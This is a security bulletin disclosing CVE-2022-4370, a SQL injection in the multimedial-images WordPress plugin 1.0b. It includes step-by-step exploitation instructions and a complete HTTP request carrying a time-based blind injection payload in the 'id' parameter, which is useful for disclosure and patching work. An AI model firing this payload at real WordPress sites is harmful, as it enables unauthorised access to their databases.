Headline
CVE-2022-4370: Security Bulletin
The multimedial images WordPress plugin through 1.0b does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Admin.
multimedial-images 1.0b WordPress plugin SQL injection****Vulnerability Metadata
Key
Value
Date of Disclosure
December 12 2022
Affected Software
multimedial-images
Affected Software Type
WordPress plugin
Version
1.0b
Weakness
SQL Injection
CWE ID
CWE-89
CVE ID
CVE-2022-4370
CVSS 3.x Base Score
n/a
CVSS 2.0 Base Score
n/a
Reporter
Daniel Krohmer, Kunal Sharma
Reporter Contact
Link to Affected Software
https://wordpress.org/plugins/multimedial-images/
Link to Vulnerability DB
https://nvd.nist.gov/vuln/detail/CVE-2022-4370
Vulnerability Description
The id query parameter in multimedial-images 1.0b is vulnerable to SQL injection. An authenticated attacker may abuse the mmi page of the plugin to craft a malicious GET request.
Exploitation Guide
This exploit was tested with WordPress 4.2, since the plugin is not working on recent WordPress versions anymore.
Login as admin user. This attack requires at least admin privileges.
Go to the Settings and then select Multimedial Images.
Uploade an image.
Select an arbitrary image file…
… and Save all changes.
Since the plugin is very buggy, you may need to insert the image path manually by clicking on Media Library…
… and Show…
… and Insert Into Post.
Save the image.
Next, click on Remove.
Clicking the previous button triggers the vulnerable request. id is the vulnerable query parameter.
A POC may look like the following request:
In the code, the vulnerability is triggered by unsanitized user input of id at line 100 in ./ultimedial_imagenes.php.
The final database query is called within the del_background function at line 90 in file ./multimedial_imagenes.php.
Exploit Payload
Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.
The SQL injection can be triggered by sending the request below.
GET /wp-admin/options-general.php?page=mmi&a=delbg&id=33+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA) HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/wp-admin/options-general.php?page=mmi
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1669457141%7CotH5c3MDrzK14OdNWXfLTBa1DY9ZllG9GuO3ruqHmCl%7C2fc3d70e2428acf2c33516d5f3ead10f94aef8a67512d1c7370221f22ad3cb1b; slt=87e6b56f-e72c-4f81-8246-c2348e20528b.1; wp-settings-time-1=1668871056; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1669457141%7CotH5c3MDrzK14OdNWXfLTBa1DY9ZllG9GuO3ruqHmCl%7C05889dde6e9a628b548d320f2834c1f11e68f1b629705454db0cbf55bf0f5a63
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1